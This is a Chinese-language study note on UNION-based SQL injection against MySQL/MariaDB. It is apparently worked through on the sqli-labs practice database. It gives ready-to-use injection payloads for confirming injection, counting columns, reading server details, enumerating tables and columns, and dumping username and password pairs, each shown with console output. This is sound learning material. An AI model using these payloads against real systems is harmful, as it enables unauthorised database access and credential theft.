MySQL_union联合查询

MySQL_union联合查询笔记

union联合查询

select * from users where id = ‘注入点’;

  • 判断确定注入
1
2
3
4
5
6
'
"
\ (转移符)
and 1=1 --+ and 1=2 --+
-1/+1 //注:'+'在URL中有特殊含义,因此需要URL编码为 %2b
%df' //宽字节
  • 判断列数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
payload:
---
' order by 3 --+ 正常
' order by 4 --+ 异常
说明表有3列
---

MariaDB [security]> select * from users where id = '1' order by 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = '1' order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
MariaDB [security]>
  • 寻找显示位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
//改负值法
MariaDB [security]> select * from users where id = '-1' union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.01 sec)

payload:
---
-1' union select 1,2,3 --+
---


//超大数值法
MariaDB [security]> select * from users where id = '9999' union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

payload:
---
9999' union select 1,2,3 --+
---


//否定法
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,3 --+
---

偶然发现,延时可以导致前面数据查询为空:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
MariaDB [security]> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5);
Empty set (5.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5) union select 1,version(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (5.00 sec)

MariaDB [security]>

  • 查看数据库信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
//查看当前数据库版本 version() / @@version
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,version(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,version(),3 --+
---


MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@version,3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | 5.5.65-MariaDB | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,@@version,3 --+
---


//查看当前登陆账户 user()
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,user(),3;
+----+----------------+----------+
| id | username | password |
+----+----------------+----------+
| 1 | root@localhost | 3 |
+----+----------------+----------+
1 row in set (0.00 sec)

payload:
---
' and 1=2 union select 1,user(),3 --+
---


//查看当前连接数据库 database()
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,database(),3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | security | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
' and 1=2 union select 1,database(),3 --+
---


//数据库路径 @@datadir
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@datadir,3;
+----+-----------------+----------+
| id | username | password |
+----+-----------------+----------+
| 1 | /var/lib/mysql/ | 3 |
+----+-----------------+----------+
1 row in set (0.01 sec)

payload:
---
1' and 1=2 union select 1,@@datadir,3 --+
---

//操作系统版本 @@version_compile_os
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,@@version_compile_os,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Linux | 3 |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]>

payload:
---
' and 1=2 union select 1,@@version_compile_os,3
---

  • 查表名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security";
+----+----------+-------------------------------+
| id | username | password |
+----+----------+-------------------------------+
| 1 | 2 | emails,referers,uagents,users |
+----+----------+-------------------------------+
1 row in set (0.01 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "security" --+
---

---
' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
---

---
1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = "数据库名" --+
---
  • 查列名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = database();
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.01 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "users" and table_schema = database() --+
---

---
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "表名" and table_schema = database() --+
---

数据库/表名可以用hex编码

1
2
3
4
5
6
7
8
9
10
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 and table_schema = 0x7365637572697479;
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.00 sec)

MariaDB [security]>

1
2
3
4
5
6
7
8
9
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 and table_schema = 0x7365637572697479);
+----+----------+----------------------+
| id | username | password |
+----+----------+----------------------+
| 1 | 2 | id,username,password |
+----+----------+----------------------+
1 row in set (0.00 sec)

MariaDB [security]>
  • 查数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
MariaDB [security]> select * from users where id = '1' and 1=2 union select 1,2,concat_ws("~",username,password) from users;
+----+----------+---------------------+
| id | username | password |
+----+----------+---------------------+
| 1 | 2 | Dumb~Dumb |
| 1 | 2 | Angelina~I-kill-you |
| 1 | 2 | Dummy~p@ssword |
| 1 | 2 | secure~crappy |
| 1 | 2 | stupid~stupidity |
| 1 | 2 | superman~genious |
| 1 | 2 | batman~mob!le |
| 1 | 2 | admin~admin |
| 1 | 2 | admin1~admin1 |
| 1 | 2 | admin2~admin2 |
| 1 | 2 | admin3~admin3 |
| 1 | 2 | dhakkan~dumbo |
| 1 | 2 | admin4~admin4 |
+----+----------+---------------------+
13 rows in set (0.00 sec)

MariaDB [security]>

payload:
---
1' and 1=2 union select 1,2,concat_ws("~",username,password) from users --+
---

---
1' and 1=2 union select 1,2,concat_ws("~",字段1,字段2) from 表名 --+
---